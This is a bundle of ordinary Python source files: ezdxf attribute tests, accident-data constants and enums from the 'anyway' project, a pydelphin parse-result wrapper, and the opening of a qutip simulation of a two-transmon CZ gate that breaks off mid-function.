    assert attribs.layer == '0'
    assert attribs.color == 256
    assert attribs.linetype == 'BYLAYER'
    # this attributes do not really exist
    assert attribs.hasattr('layer') is False
    assert attribs.hasattr('color') is False
    assert attribs.hasattr('linetype') is False


def test_get_value_with_default(entity, processor):
    attribs = DXFNamespace(processor, entity)
    # return existing values
    assert attribs.get('handle', '0') == 'FFFF'
    # return given default value not DXF default value, which would be '0'
    assert attribs.get('layer', 'mozman') == 'mozman'
    # attribute has to a valid DXF attribute
    with pytest.raises(DXFAttributeError):
        _ = attribs.get('hallo', 0)
    # attribs without default returns None -> will not exported to DXF file
    assert attribs.color_name is None


def test_set_values(entity, processor):
    # Attribute assignment and the set() API are interchangeable.
    attribs = DXFNamespace(processor, entity)
    attribs.handle = 'CDEF'
    assert attribs.handle == 'CDEF'
    attribs.set('owner', 'DADA')
    assert attribs.owner == 'DADA'
    # set new attribute
    attribs.color = 7
    assert attribs.color == 7
    attribs.set('linetype', 'DOT')
    assert attribs.linetype == 'DOT'
    # attribute has to a valid DXF attribute
    with pytest.raises(DXFAttributeError):
        attribs.hallo = 0
    with pytest.raises(DXFAttributeError):
        attribs.set('hallo', 0)


def test_value_types(entity, processor):
    # Value coercion rules for the most common attribute types.
    attribs = DXFNamespace(processor, entity)
    attribs.handle = None  # None is always accepted, attribute is ignored at export
    assert attribs.handle is None
    attribs.handle = 'XYZ'
    assert attribs.handle == 'XYZ', 'handle is just a string'
    attribs.handle = 123
    assert attribs.handle == '123', 'handle is just a string'
    with pytest.raises(ValueError):
        attribs.color = 'xxx'
    # Vertex attributes accept plain tuples and expose x/y/z components.
    attribs.start = (1, 2, 3)  # type: Vector
    assert attribs.start == (1, 2, 3)
    assert attribs.start.x == 1
    assert attribs.start.y == 2
    assert attribs.start.z == 3


def test_delete_attribs(entity, processor):
    attribs = DXFNamespace(processor, entity)
    attribs.layer = 'mozman'
    assert attribs.layer == 'mozman'
    del attribs.layer
    # default value
    assert attribs.layer == '0'
    # Deleting a never-set attribute raises...
    with pytest.raises(DXFAttributeError):
        del attribs.color
    attribs.discard('color')  # delete silently if not exists
    # ...and discard() must not have created it, so del still raises.
    with pytest.raises(DXFAttributeError):
        del attribs.color


def test_is_supported(entity, processor):
    attribs = DXFNamespace(processor, entity)
    assert attribs.is_supported('linetype') is True
    assert attribs.is_supported('true_color') is True  # ezdxf does not care about DXF versions at runtime
    assert attribs.is_supported('xxx_mozman_xxx') is False


def test_dxftype(entity, processor):
    # dxftype mirrors the mockup's DXFTYPE class attribute.
    attribs = DXFNamespace(processor, entity)
    assert attribs.dxftype == 'DXFENTITY'


def test_cloning(entity, processor):
    attribs = DXFNamespace(processor, entity)
    attribs.color = 77
    attribs2 = attribs.copy(entity)
    # clone everything
    assert attribs2._entity is attribs._entity
    assert attribs2.handle is attribs.handle
    assert attribs2.owner is attribs.owner
    assert attribs2.color == 77
    # do not harm original entity
    assert attribs._entity is entity
    assert attribs.handle == 'FFFF'
    assert attribs.owner == 'ABBA'
    # change clone
    attribs2.color = 13
    assert attribs.color == 77
    assert attribs2.color == 13


def test_deepcopy_usage(entity, processor):
    # deepcopy must behave like copy(): shared entity, independent attributes.
    attribs = DXFNamespace(processor, entity)
    attribs.color = 77
    attribs2 = deepcopy(attribs)
    # clone everything
    assert attribs2._entity is attribs._entity
    assert attribs2.handle is attribs.handle
    assert attribs2.owner is attribs.owner
    assert attribs2.color == 77
    # do not harm original entity
    assert attribs._entity is entity
    assert attribs.handle == 'FFFF'
    assert attribs.owner == 'ABBA'
    # change clone
    attribs2.color = 13
    assert attribs.color == 77
    assert attribs2.color == 13


def test_dxf_export_one_attribute(entity, processor):
    attribs = DXFNamespace(processor, entity)
    tagwriter = TagCollector()
    attribs.export_dxf_attribs(tagwriter, 'handle')
    assert len(tagwriter.tags) == 1
    assert tagwriter.tags[0] == (5, 'FFFF')
    # NOTE(review): singular `export_dxf_attribute` here vs. plural
    # `export_dxf_attribs` above -- confirm both APIs exist in ezdxf.
    with pytest.raises(DXFAttributeError):
        attribs.export_dxf_attribute(tagwriter, 'mozman')


def test_dxf_export_two_attribute(entity, processor):
    attribs = DXFNamespace(processor, entity)
    tagwriter = TagCollector()
    attribs.export_dxf_attribs(tagwriter, ['handle', 'owner'])
    assert len(tagwriter.tags) == 2
    assert tagwriter.tags[0] == (5, 'FFFF')
    assert tagwriter.tags[1] == (330, 'ABBA')


def test_load_doublettes():
    # Two attributes sharing group code 1 must be loaded in definition order.
    from ezdxf.lldxf.attributes import DefSubclass, DXFAttr
    from ezdxf.lldxf.tags import Tags, DXFTag

    subclass = DefSubclass('AcDbTest', {
        'test1': DXFAttr(1),
        'test2': DXFAttr(2),
        'test3': DXFAttr(1),  # same group code for different attribute
    })

    class TestEntity(DXFEntity):
        DXFATTRIBS = DXFAttributes(subclass)

    data = Tags([
        DXFTag(1, '1'),
        DXFTag(2, '2'),
        DXFTag(1, '3'),
    ])
    ns = DXFNamespace(entity=TestEntity())
    SubclassProcessor.load_tags_into_namespace(ns, data, subclass)
    assert ns.test1 == '1'
    assert ns.test2 == '2'
    assert ns.test3 == '3'


# Minimal DXF tag stream used by the `processor` fixture: entity type,
# handle (group code 5) and owner (group code 330).
TEST_1 = """0
DXFENTITY
5
FFFF
330
ABBA
"""

if __name__ == '__main__':
    pytest.main([__file__])
|
<reponame>MichalOren/anyway
from enum import Enum
from typing import List, Iterable
try:
from flask_babel import _
except ImportError:
pass
# noinspection PyProtectedMember
class BackEndConstants(object):
    """Central bag of backend constants (marker/provider codes, road types,
    CORS origins, cache settings). Exposed as the module-level ``BE_CONST``."""

    MARKER_TYPE_ACCIDENT = 1
    MARKER_TYPE_DISCUSSION = 2

    # Data-provider codes.
    CBS_ACCIDENT_TYPE_1_CODE = 1
    UNITED_HATZALA_CODE = 2
    CBS_ACCIDENT_TYPE_3_CODE = 3
    RSA_PROVIDER_CODE = 4
    BIKE_ACCIDENTS = 21

    AGE_GROUPS_NUMBER = 18
    # Groups 1..18 plus the catch-all group 99.
    ALL_AGE_GROUPS_LIST = list(range(1, AGE_GROUPS_NUMBER + 1)) + [99]

    # This class should be correlated with the Roles table
    class Roles2Names(Enum):
        Admins = "admins"
        Or_yarok = "or_yarok"
        Authenticated = "authenticated"

    # This is a type for the 'road_type' table field name
    ROAD_TYPE_NOT_IN_CITY_IN_INTERSECTION = 3
    ROAD_TYPE_NOT_IN_CITY_NOT_IN_INTERSECTION = 4
    NON_CITY_ROAD_TYPES = [
        ROAD_TYPE_NOT_IN_CITY_IN_INTERSECTION,
        ROAD_TYPE_NOT_IN_CITY_NOT_IN_INTERSECTION,
    ]

    # other global constants (python only)
    DEFAULT_NUMBER_OF_YEARS_AGO = 5
    # years ago to store in cache
    INFOGRAPHICS_CACHE_YEARS_AGO = [1, 3, 5, 8]

    # News-flash source id -> display name.
    SOURCE_MAPPING = {"walla": "וואלה", "twitter": "מד״א", "ynet": "ynet"}
    UNKNOWN = "UNKNOWN"
    DEFAULT_REDIRECT_URL = "https://anyway-infographics.web.app/"

    # Origins allowed by CORS in production.
    ANYWAY_CORS_SITE_LIST_PROD = [
        "https://anyway-infographics-staging.web.app",
        "https://anyway-infographics.web.app",
        "https://www.anyway.co.il",
        "https://anyway-infographics-demo.web.app",
        "https://media.anyway.co.il",
        "https://dev.anyway.co.il",
    ]
    # NOTE(review): "https://dev.anyway.co.il" appears both in the PROD list
    # above and again here -- a harmless duplicate, but confirm it is intended.
    ANYWAY_CORS_SITE_LIST_DEV = ANYWAY_CORS_SITE_LIST_PROD + [
        "https://dev.anyway.co.il",
        "http://localhost:3000",
        "https://localhost:3000",
        "http://127.0.0.1:3000",
        "https://127.0.0.1:3000",
    ]

    class ResolutionCategories(Enum):
        # Geographic resolution of a location; the Hebrew values are the
        # strings stored in the database.
        REGION = "מחוז"
        DISTRICT = "נפה"
        CITY = "עיר"
        STREET = "רחוב"
        URBAN_JUNCTION = "צומת עירוני"
        SUBURBAN_ROAD = "כביש בינעירוני"
        SUBURBAN_JUNCTION = "צומת בינעירוני"
        OTHER = "אחר"

    SUPPORTED_RESOLUTIONS: List[ResolutionCategories] = [
        ResolutionCategories.STREET,
        ResolutionCategories.SUBURBAN_ROAD,
    ]

    class Source(Enum):
        @classmethod
        def _missing_(cls, value):
            # Case-insensitive lookup: Source("Ynet") -> Source.YNET.
            # Falls through (returns None) for unknown values, which makes
            # the Enum constructor raise ValueError as usual.
            for member in cls:
                if member.value == value.lower():
                    return member

        YNET = "ynet"
        WALLA = "walla"
        TWITTER = "twitter"

    SUPPORTED_SOURCES: List[Source] = [Source.YNET, Source.WALLA, Source.TWITTER]

    # If in the future there will be a number of organizations or a need for a dynamic setting change, move this
    # data to a table in the DB.
    OR_YAROK_WIDGETS = [
        "accident_count_by_severity",
        "most_severe_accidents_table",
        "most_severe_accidents",
        "vision_zero_2_plus_1",
        "head_on_collisions_comparison",
    ]

    # Common dictionary keys used by the infographics widget payloads.
    LKEY = "label_key"
    VAL = "value"
    SERIES = "series"


# Singleton-style instance used throughout the code base.
BE_CONST = BackEndConstants()
class LabeledCode(Enum):
    """Enum base class pairing each member with a human-readable label.

    Subclasses override :meth:`labels` to provide the member -> label mapping.
    """

    def get_label(self) -> str:
        """Return the display label registered for this member."""
        return type(self).labels()[self]

    @classmethod
    def codes(cls: Iterable) -> List[int]:
        """Return the raw integer values of all members, in definition order."""
        if not isinstance(cls, Iterable):
            raise NotImplementedError(f"{cls}: needs to be derived from Enum")
        return [member.value for member in cls]

    @classmethod
    def labels(cls):
        """Member -> label mapping; empty here, overridden by subclasses."""
        return {}
# This is a type for the field 'injury_severity' in the table 'involved_markers_hebrew'
class InjurySeverity(LabeledCode):
    """Severity of a single involved person's injury."""

    KILLED = 1
    SEVERE_INJURED = 2
    LIGHT_INJURED = 3

    @classmethod
    def labels(cls):
        return {
            cls.KILLED: "killed",
            cls.SEVERE_INJURED: "severe injured",
            cls.LIGHT_INJURED: "light injured",
        }


# Register the label strings with flask_babel's translation extractor when
# the optional dependency is available; harmless no-op otherwise.
try:
    _("killed")
    _("severe injured")
    _("light injured")
except NameError:
    pass
# This is a type for the 'accident_severity' table field name
class AccidentSeverity(LabeledCode):
    """Overall severity classification of an accident record."""

    FATAL = 1
    SEVERE = 2
    LIGHT = 3

    @classmethod
    def labels(cls):
        return {
            cls.FATAL: "fatal",
            cls.SEVERE: "severe",
            cls.LIGHT: "light",
        }
class AccidentType(LabeledCode):
    """CBS accident-type codes with English display labels.

    Note the gap at 16: there is no member with that code.
    """
    PEDESTRIAN_INJURY = 1
    COLLISION_OF_FRONT_TO_SIDE = 2
    COLLISION_OF_FRONT_TO_REAR_END = 3
    COLLISION_OF_SIDE_TO_SIDE_LATERAL = 4
    HEAD_ON_FRONTAL_COLLISION = 5
    COLLISION_WITH_A_STOPPED_NON_PARKED_VEHICLE = 6
    COLLISION_WITH_A_PARKED_VEHICLE = 7
    COLLISION_WITH_AN_INANIMATE_OBJECT = 8
    SWERVING_OFF_THE_ROAD_OR_ONTO_THE_PAVEMENT = 9
    OVERTURNED_VEHICLE = 10
    SKID = 11
    INJURY_OF_A_PASSENGER_IN_A_VEHICLE = 12
    A_FALL_FROM_A_MOVING_VEHICLE = 13
    FIRE = 14
    OTHER = 15
    COLLISION_OF_REAR_END_TO_FRONT = 17
    COLLISION_OF_REAR_END_TO_SIDE = 18
    COLLISION_WITH_AN_ANIMAL = 19
    DAMAGE_CAUSED_BY_A_FALLING_LOAD_OFF_A_VEHICLE = 20

    @classmethod
    def labels(cls):
        # Display labels used by the infographics widgets.
        return {
            AccidentType.PEDESTRIAN_INJURY: "Pedestrian injury",
            AccidentType.COLLISION_OF_FRONT_TO_SIDE: "Collision of front to side",
            AccidentType.COLLISION_OF_FRONT_TO_REAR_END: "Collision of front to rear-end",
            AccidentType.COLLISION_OF_SIDE_TO_SIDE_LATERAL: "Collision of side to side (lateral)",
            AccidentType.HEAD_ON_FRONTAL_COLLISION: "Head-on frontal collision",
            AccidentType.COLLISION_WITH_A_STOPPED_NON_PARKED_VEHICLE: "Collision with a stopped non-parked vehicle",
            AccidentType.COLLISION_WITH_A_PARKED_VEHICLE: "Collision with a parked vehicle",
            AccidentType.COLLISION_WITH_AN_INANIMATE_OBJECT: "Collision with an inanimate object",
            AccidentType.SWERVING_OFF_THE_ROAD_OR_ONTO_THE_PAVEMENT: "Swerving off the road or onto the pavement",
            AccidentType.OVERTURNED_VEHICLE: "Overturned vehicle",
            AccidentType.SKID: "Skid",
            AccidentType.INJURY_OF_A_PASSENGER_IN_A_VEHICLE: "Injury of a passenger in a vehicle",
            AccidentType.A_FALL_FROM_A_MOVING_VEHICLE: "A fall from a moving vehicle",
            AccidentType.FIRE: "Fire",
            AccidentType.OTHER: "Other",
            AccidentType.COLLISION_OF_REAR_END_TO_FRONT: "Collision of rear-end to front",
            AccidentType.COLLISION_OF_REAR_END_TO_SIDE: "Collision of rear-end to side",
            AccidentType.COLLISION_WITH_AN_ANIMAL: "Collision with an animal",
            AccidentType.DAMAGE_CAUSED_BY_A_FALLING_LOAD_OFF_A_VEHICLE: "Damage caused by a falling load off a vehicle",
        }
class DriverType(LabeledCode):
    """Coarse classification of the driver involved in an accident."""

    PROFESSIONAL_DRIVER = 1
    PRIVATE_VEHICLE_DRIVER = 2
    OTHER_DRIVER = 3

    @classmethod
    def labels(cls):
        return {
            cls.PROFESSIONAL_DRIVER: "professional_driver",
            cls.PRIVATE_VEHICLE_DRIVER: "private_vehicle_driver",
            cls.OTHER_DRIVER: "other_driver",
        }
class InjuredType(LabeledCode):
    """Role of an injured person, by vehicle category (driver vs. passenger)."""
    PEDESTRIAN = 1
    DRIVER_FOUR_WHEELS_AND_ABOVE = 2
    PASSENGER_FOUR_WHEELS_AND_ABOVE = 3
    DRIVER_MOTORCYCLE = 4
    PASSENGER_MOTORCYCLE = 5
    DRIVER_BICYCLE = 6
    PASSENGER_BICYCLE = 7
    DRIVER_UNKNOWN_VEHICLE = 8
    PASSENGER_UNKNOWN_VEHICLE = 9

    @classmethod
    def labels(cls):
        # Display labels used by the infographics widgets.
        return {
            InjuredType.PEDESTRIAN: "Pedestrian",
            InjuredType.DRIVER_FOUR_WHEELS_AND_ABOVE: "Driver of a vehicle with 4 wheel or more",
            InjuredType.PASSENGER_FOUR_WHEELS_AND_ABOVE: "Passenger of a vehicle with 4 wheel or more",
            InjuredType.DRIVER_MOTORCYCLE: "Motorcycle driver",
            InjuredType.PASSENGER_MOTORCYCLE: "Motorcycle passenger",
            InjuredType.DRIVER_BICYCLE: "Bicycle driver",
            InjuredType.PASSENGER_BICYCLE: "Bicycle passenger",
            InjuredType.DRIVER_UNKNOWN_VEHICLE: "Driver of an unknown vehicle",
            InjuredType.PASSENGER_UNKNOWN_VEHICLE: "Passenger of an unknown vehicle",
        }
class CrossLocation(Enum):
    """Where a pedestrian crossed, relative to crosswalks and intersections."""

    UNKNOWN = 9
    OUTNEAR = 1
    OUTFAR = 2
    YESNONE = 3
    YESLIGHT = 4

    @classmethod
    def labels(cls):
        return {
            cls.UNKNOWN: "Location unknown",
            cls.OUTNEAR: "Near the intersection, outside the crosswalk",
            cls.OUTFAR: "Away from the intersection, outside the crosswalk",
            cls.YESNONE: "In the crosswalk, without a crossing light",
            cls.YESLIGHT: "In the crosswalk, with a crossing light",
        }


class CrossCategory(Enum):
    """Coarse grouping of :class:`CrossLocation` codes."""

    UNKNOWN = 0
    NONE = 1
    CROSSWALK = 2

    def get_codes(self) -> List[int]:
        """returns CrossLocation codes of category"""
        grouping = {
            CrossCategory.UNKNOWN: [CrossLocation.UNKNOWN],
            CrossCategory.NONE: [CrossLocation.OUTFAR, CrossLocation.OUTNEAR],
            CrossCategory.CROSSWALK: [CrossLocation.YESLIGHT, CrossLocation.YESNONE],
        }
        return [location.value for location in grouping[self]]
|
# `Sequence` moved to `collections.abc` in Python 3.3 and was removed from
# `collections` in Python 3.10; importing from `collections` crashes there.
try:
    from collections.abc import Sequence
except ImportError:  # Python 2 fallback
    from collections import Sequence
from delphin.derivation import Derivation
from delphin.tokens import YyTokenLattice
from delphin.mrs import (
Mrs,
Dmrs,
simplemrs,
eds,
)
from delphin.util import SExpr, stringtypes
class ParseResult(dict):
    """
    A wrapper around a result dictionary to automate deserialization
    for supported formats. A ParseResult is still a dictionary, so the
    raw data can be obtained using dict access.
    """

    def __repr__(self):
        return 'ParseResult({})'.format(dict.__repr__(self))

    def derivation(self):
        """
        Deserialize and return a Derivation object for UDF- or
        JSON-formatted derivation data; otherwise return the original
        string.
        """
        drv = self.get('derivation')
        if drv is not None:
            # dict -> JSON-style payload; string -> UDF notation.
            if isinstance(drv, dict):
                drv = Derivation.from_dict(drv)
            elif isinstance(drv, stringtypes):
                drv = Derivation.from_string(drv)
        return drv

    def tree(self):
        """
        Deserialize and return a labeled syntax tree. The tree data
        may be a standalone datum, or embedded in the derivation.
        """
        tree = self.get('tree')
        if isinstance(tree, stringtypes):
            # Standalone S-expression string.
            tree = SExpr.parse(tree).data
        elif tree is None:
            # No standalone tree: try to recover one from a JSON derivation.
            drv = self.get('derivation')
            if isinstance(drv, dict) and 'label' in drv:
                def _extract_tree(d):
                    # Recursively build [label, child...] lists; leaves
                    # (nodes with 'tokens') contribute their surface form.
                    t = [d.get('label', '')]
                    if 'tokens' in d:
                        t.append([d.get('form', '')])
                    else:
                        for dtr in d.get('daughters', []):
                            t.append(_extract_tree(dtr))
                    return t
                tree = _extract_tree(drv)
        return tree

    def mrs(self):
        """
        Deserialize and return an Mrs object for simplemrs or
        JSON-formatted MRS data; otherwise return the original string.
        """
        mrs = self.get('mrs')
        if mrs is not None:
            if isinstance(mrs, dict):
                mrs = Mrs.from_dict(mrs)
            elif isinstance(mrs, stringtypes):
                mrs = simplemrs.loads_one(mrs)
        return mrs

    def eds(self):
        """
        Deserialize and return an Eds object for native- or
        JSON-formatted EDS data; otherwise return the original string.
        """
        # Local name is underscored to avoid shadowing the `eds` module.
        _eds = self.get('eds')
        if _eds is not None:
            if isinstance(_eds, dict):
                _eds = eds.Eds.from_dict(_eds)
            elif isinstance(_eds, stringtypes):
                _eds = eds.loads_one(_eds)
        return _eds

    def dmrs(self):
        """
        Deserialize and return a Dmrs object for JSON-formatted DMRS
        data; otherwise return the original string.
        """
        dmrs = self.get('dmrs')
        if dmrs is not None:
            if isinstance(dmrs, dict):
                dmrs = Dmrs.from_dict(dmrs)
        return dmrs
class ParseResponse(dict):
    """
    A wrapper around the response dictionary for more convenient
    access to results.
    """
    _result_factory = ParseResult

    def __repr__(self):
        return 'ParseResponse({})'.format(dict.__repr__(self))

    def results(self):
        """Return ParseResult objects for each result."""
        factory = self._result_factory
        return [factory(raw) for raw in self.get('results', [])]

    def result(self, i):
        """Return a ParseResult object for the *i*th result."""
        return self._result_factory(self.get('results', [])[i])

    def tokens(self, tokenset='internal'):
        """
        Deserialize and return a YyTokenLattice object for the
        initial or internal token set, if provided, from the YY
        format or the JSON-formatted data; otherwise return the
        original string.
        Args:
            tokenset: either `initial` or `internal` (default: `internal`)
        """
        toks = self.get('tokens', {}).get(tokenset)
        if toks is None:
            return None
        if isinstance(toks, stringtypes):
            return YyTokenLattice.from_string(toks)
        if isinstance(toks, Sequence):
            return YyTokenLattice.from_list(toks)
        return toks
|
<reponame>ZW7436/PycQED_py3
"""
April 2018
Simulates the trajectory implementing a CZ gate.
June 2018
Included noise in the simulation.
July 2018
Added distortions to simulation.
"""
import time
import numpy as np
import qutip as qtp
from pycqed.measurement import detector_functions as det
from scipy.interpolate import interp1d
from pycqed.measurement.waveform_control_CC import waveform as wf
import scipy
import matplotlib.pyplot as plt
#np.set_printoptions(threshold=np.inf)
# operators
# Two coupled qutrits; tensor ordering is H_q1 (x) H_q0 (cf. the
# coupled_transmons_hamiltonian docstring: "q1 is the first qubit and q0
# the second one"). b acts on the first factor, a on the second.
b = qtp.tensor(qtp.destroy(3), qtp.qeye(3))  # LSB is static qubit
a = qtp.tensor(qtp.qeye(3), qtp.destroy(3))
n_q0 = a.dag() * a  # number operator of q0 (fluxing qubit)
n_q1 = b.dag() * b  # number operator of q1 (static qubit)
H_coupling = (a.dag() + a) * (b + b.dag())  # exchange-coupling operator
H_c = n_q0  # control Hamiltonian: a flux pulse shifts the q0 frequency
scalefactor=1e6  # NOTE(review): defined but not used in this chunk -- confirm
'''
alpha_q0 = -285e6 * 2*np.pi
alpha_q1 = -310e6 * 2*np.pi
w_q0 = 5.11e9 * 2*np.pi # Higher frequency qubit (fluxing) qubit
w_q1 = 4.10e9 * 2*np.pi # Lower frequency
J = 2.9e6 * 2 * np.pi # coupling strength
# caracteristic timescales for jump operators
T1_q0=34e-6
T1_q1=42e-6
Tphi_q0_ket0toket0=0 # here useless parameters
Tphi_q0_ket1toket1=0
Tphi_q0_ket2toket2=0
Tphi_q1_ket0toket0=0
Tphi_q1_ket1toket1=0
T2_q0=23e-6 # these two are the coherence times for q0 and q1 as qubits
T2_q1=23e-6
Tphi_q0_sigmaZ_01=1/(-1/(2*T1_q0)+1/T2_q0) # extracting Tphi which is not the Tphi above
Tphi_q0_sigmaZ_12=Tphi_q0_sigmaZ_01 # we will assume for the moment that the pure decoherence
# is caused by wiggles in the frequency, which cause
# a fluctuation half as large for 02 wrt 01 and 12
# (ignoring the anharmonicity)
Tphi_q0_sigmaZ_02=Tphi_q0_sigmaZ_01/2
Tphi_q1_sigmaZ_01=1/(-1/(2*T1_q1)+1/T2_q1)
'''
# Hamiltonian
def coupled_transmons_hamiltonian(w_q0, w_q1, alpha_q0, alpha_q1, J, w_bus):
    """
    Hamiltonian of two coupled anharmonic transmons.
    Because the intention is to tune one qubit into resonance with the other,
    the number of levels is limited.
        q1 -> static qubit, 3-levels
        q0 -> fluxing qubit, 3-levels

    intended avoided crossing:
        11 <-> 02     (q1 is the first qubit and q0 the second one)

    N.B. the frequency of q0 is expected to be larger than that of q1
        w_q0 > w_q1
        and the anharmonicities alpha negative

    Parameters
    ----------
    w_q0, w_q1 : float
        Bare frequencies of the fluxing (q0) and static (q1) qubit.
    alpha_q0, alpha_q1 : float
        Anharmonicities (negative for transmons).
    J : float
        Coupling strength, specified at the interaction point.
    w_bus : float
        Frequency of the bus resonator mediating the coupling.
    """
    eps = 0
    delta_q1 = w_q1 - w_bus
    delta_q0_interactionpoint = (w_q1 - alpha_q0) - w_bus
    delta_q0 = (w_q0 + eps) - w_bus
    # Rescale J from the interaction point to the current detunings: the
    # bus-mediated coupling is proportional to the sum of inverse detunings.
    J_new = J / ((delta_q1 + delta_q0_interactionpoint) / (delta_q1 * delta_q0_interactionpoint)) * (delta_q1 + delta_q0) / (delta_q1 * delta_q0)
    # Number terms + anharmonicity terms + exchange coupling; a, b, n_q0 and
    # n_q1 are the module-level qutrit operators.
    H_0 = w_q0 * n_q0 + w_q1 * n_q1 + \
        1 / 2 * alpha_q0 * (a.dag() * a.dag() * a * a) + 1 / 2 * alpha_q1 * (b.dag() * b.dag() * b * b) + \
        J_new * (a.dag() + a) * (b + b.dag())
    return H_0
def hamiltonian_timedependent(H_0, eps, w_bus):
    """Return ``H_0`` shifted by a flux detuning ``eps`` of the fluxing qubit.

    The qubit parameters are read back from matrix elements of ``H_0``
    (basis ordering 00,01,02,10,11,12,...: element [1,1] is the q0
    frequency, [3,3] the q1 frequency, [1,3] the coupling), and the
    bus-mediated coupling J is rescaled to the new detuning.
    """
    w_q0 = np.real(H_0[1, 1])
    w_q1 = np.real(H_0[3, 3])
    # NOTE(review): alpha_q0 is computed but not used below -- confirm.
    alpha_q0 = np.real(H_0[2, 2]) - 2 * w_q0
    J = np.real(H_0[1, 3])
    delta_q1 = w_q1 - w_bus
    delta_q0_sweetspot = (w_q0) - w_bus
    delta_q0 = (w_q0 + eps) - w_bus
    # Same J-rescaling as in coupled_transmons_hamiltonian, but referenced to
    # the sweet spot instead of the interaction point.
    J_new = J / ((delta_q1 + delta_q0_sweetspot) / (delta_q1 * delta_q0_sweetspot)) * (delta_q1 + delta_q0) / (delta_q1 * delta_q0)
    return H_0 + eps * H_c + (J_new - J) * H_coupling
#H_0 = coupled_transmons_hamiltonian(w_q0=w_q0, w_q1=w_q1, alpha_q0=alpha_q0,alpha_q1=alpha_q1,J=J)
# target in the case with no noise
# note that the Hilbert space is H_q1 /otimes H_q0
# so the ordering of basis states below is 00,01,02,10,11,12,20,21,22
# Ideal CZ unitary: -1 phase on |02> (index 2) and |11> (index 4); the phase
# on |02> reflects the 11 <-> 02 avoided crossing used to implement the gate.
U_target = qtp.Qobj([[1, 0, 0, 0, 0, 0, 0, 0, 0],
                     [0, 1, 0, 0, 0, 0, 0, 0, 0],
                     [0, 0, -1, 0, 0, 0, 0, 0, 0],
                     [0, 0, 0, 1, 0, 0, 0, 0, 0],
                     [0, 0, 0, 0, -1, 0, 0, 0, 0],
                     [0, 0, 0, 0, 0, 1, 0, 0, 0],
                     [0, 0, 0, 0, 0, 0, 1, 0, 0],
                     [0, 0, 0, 0, 0, 0, 0, 1, 0],
                     [0, 0, 0, 0, 0, 0, 0, 0, 1]],
                    type='oper',
                    dims=[[3, 3], [3, 3]])
#U_target._type = 'oper'
# Same matrix, but flattened to a single 9-dimensional space.
U_target_diffdims = qtp.Qobj([[1, 0, 0, 0, 0, 0, 0, 0, 0],
                              [0, 1, 0, 0, 0, 0, 0, 0, 0],
                              [0, 0, -1, 0, 0, 0, 0, 0, 0],
                              [0, 0, 0, 1, 0, 0, 0, 0, 0],
                              [0, 0, 0, 0, -1, 0, 0, 0, 0],
                              [0, 0, 0, 0, 0, 1, 0, 0, 0],
                              [0, 0, 0, 0, 0, 0, 1, 0, 0],
                              [0, 0, 0, 0, 0, 0, 0, 1, 0],
                              [0, 0, 0, 0, 0, 0, 0, 0, 1]],
                             type='oper',
                             dims=[[9], [9]])  # otherwise average_gate_fidelity doesn't work
# if there is noise the target is the corresponding superoperator
U_super_target = qtp.to_super(U_target)
'''
remember that qutip uses the Liouville (matrix) representation for superoperators,
with column stacking.
This means that
rho_{xy,x'y'}=rho[3*x+y,3*x'+y']
rho_{xy,x'y'}=operator_to_vector(rho)[3*x+y+27*x'+9*y'] VERIFY
where xy is the row and x'y' is the column
'''
def plot(x_plot_vec, y_plot_vec, title='No title', xlabel='No xlabel',
         ylabel='No ylabel', legend_labels=None, yscale='linear'):
    """Plot one or several curves with matplotlib and show the figure.

    Parameters
    ----------
    x_plot_vec : list
        Either a single x-axis vector (shared by all curves) or one vector
        per curve.
    y_plot_vec : list or array
        One y-axis vector per curve.
    title, xlabel, ylabel, yscale : str
        Standard matplotlib figure settings.
    legend_labels : list or None
        One label per curve; defaults to the curve index.

    Notes
    -----
    The previous version used a mutable default argument
    (``legend_labels=list()``) and converted the caller's lists in place;
    both issues are fixed here by working on local copies.
    """
    if isinstance(y_plot_vec, list):
        y_length = len(y_plot_vec)
    else:
        y_length = np.size(y_plot_vec)
    # Work on local copies so the caller's lists are never mutated in place.
    if legend_labels is None or legend_labels == []:
        legend_labels = list(np.arange(y_length))
    else:
        legend_labels = list(legend_labels)
    x_plot_vec = list(x_plot_vec)
    if isinstance(y_plot_vec, list):
        y_plot_vec = list(y_plot_vec)
    for i in range(y_length):
        if isinstance(y_plot_vec[i], list):
            y_plot_vec[i] = np.array(y_plot_vec[i])
        if isinstance(legend_labels[i], int):
            legend_labels[i] = str(legend_labels[i])
        if len(x_plot_vec) == 1:
            # Single x-vector shared by all curves.
            if isinstance(x_plot_vec[0], list):
                x_plot_vec[0] = np.array(x_plot_vec[0])
            plt.plot(x_plot_vec[0], y_plot_vec[i], label=legend_labels[i])
        else:
            if isinstance(x_plot_vec[i], list):
                x_plot_vec[i] = np.array(x_plot_vec[i])
            plt.plot(x_plot_vec[i], y_plot_vec[i], label=legend_labels[i])
    plt.legend()
    plt.title(title)
    plt.xlabel(xlabel)
    plt.ylabel(ylabel)
    plt.yscale(yscale)
    plt.show()
def jump_operators(T1_q0, T1_q1, Tphi_q0_ket0toket0, Tphi_q0_ket1toket1, Tphi_q0_ket2toket2, Tphi_q1_ket0toket0, Tphi_q1_ket1toket1,
                   Tphi_q0_sigmaZ_01, Tphi_q0_sigmaZ_12, Tphi_q0_sigmaZ_02, Tphi_q1_sigmaZ_01, Tphi_q1_sigmaZ_12, Tphi_q1_sigmaZ_02):
    """Build the time-independent Lindblad collapse operators for the two
    qutrits.

    Each characteristic time of 0 disables the corresponding operator.
    T1_* produce relaxation; Tphi_*_ketXtoketX produce projector-type
    dephasing; Tphi_*_sigmaZ_ij produce sigma_Z-like pure dephasing between
    levels i and j (rate 1/(2*Tphi), the standard Lindblad convention).

    :return: list of qutip operators, in the same order as the original
        hand-unrolled implementation.
    """
    def _sigma_z_qutrit(plus_level, minus_level):
        # sigma_Z-like qutrit operator: +1 on `plus_level`, -1 on
        # `minus_level`, 0 on the remaining level.
        mat = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]
        mat[plus_level][plus_level] = 1
        mat[minus_level][minus_level] = -1
        return qtp.Qobj(mat)

    c_ops = []
    # Relaxation (T1) on each transmon.
    if T1_q0 != 0:
        c_ops.append(np.sqrt(1 / T1_q0) * a)
    if T1_q1 != 0:
        c_ops.append(np.sqrt(1 / T1_q1) * b)
    # Projector-type dephasing terms on q0 (second tensor factor).
    for rate, level in ((Tphi_q0_ket0toket0, 0),
                        (Tphi_q0_ket1toket1, 1),
                        (Tphi_q0_ket2toket2, 2)):
        if rate != 0:
            collapse = qtp.tensor(qtp.qeye(3), qtp.ket2dm(qtp.basis(3, level)))
            c_ops.append(np.sqrt(1 / rate) * collapse)
    # Projector-type dephasing terms on q1 (first tensor factor).
    for rate, level in ((Tphi_q1_ket0toket0, 0),
